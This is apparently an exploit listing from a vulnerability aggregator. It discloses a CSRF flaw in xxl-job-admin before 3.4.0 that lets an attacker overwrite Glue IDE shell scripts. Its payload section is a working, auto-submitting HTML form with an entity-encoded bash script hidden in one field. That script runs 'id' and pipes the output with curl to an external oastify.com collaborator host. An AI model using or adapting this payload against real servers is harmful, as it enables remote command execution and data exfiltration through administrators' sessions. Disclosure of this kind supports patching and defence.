Share
## https://sploitus.com/exploit?id=PACKETSTORM:226017
## Description
    # Summary
    A Cross-Site Request Forgery (CSRF) vulnerability exists in the xxl-job-admin web application that allows an attacker to perform unauthorized modifications to Glue IDE shell scripts. The affected endpoint lacks proper CSRF token validation and accepts arbitrary HTTP methods via a permissive request mapping
    
    # Affected Products
    
    ```text
    xxl-job < 3.4.0
    ```
    # Impact
    
    An attacker can trick an authenticated administrator into making unauthorized changes to Glue IDE shell scripts.
    
    # Proof of Concept
    
    <img width="1280" height="720" alt="Slide1" src="https://github.com/user-attachments/assets/630e6c5f-96ce-4e78-acdc-b65bd401d064" />
    
    <img width="1280" height="720" alt="Slide2" src="https://github.com/user-attachments/assets/8e4ecb6e-a837-48de-8718-d91f6418aa3a" />
    
    <img width="1280" height="720" alt="Slide3" src="https://github.com/user-attachments/assets/f7db38ac-ab21-4db1-b178-1d28fa4492ab" />
    
    <img width="1280" height="720" alt="Slide4" src="https://github.com/user-attachments/assets/9648c354-f35f-432f-baa0-3b29811772f8" />
    
    # Payload 
    
    ```text
    
    // Decode and change it 
    
    <html>
      <body>
        <form action="https://domain.com/jobcode/save">
          <input type="hidden" name="id" value="294" />
          <input type="hidden" name="glueSource" value="&#35;&#33;&#47;bin&#47;bash&#10;id&#32;&#124;&#32;curl&#32;&#45;d&#32;&#64;&#45;&#32;http&#58;&#47;&#47;qic8br6d6om2j459zk4evuimldr4f03p&#46;oastify&#46;com&#32;&#10;exit&#32;0&#10;" />
          <input type="hidden" name="glueRemark" value="12345" />
          <input type="submit" value="Submit request" />
        </form>
        <script>
          history.pushState('', '', '/');
          document.forms[0].submit();
        </script>
      </body>
    </html>
    
    ```
    Credits to
    Ibrahim Sartawi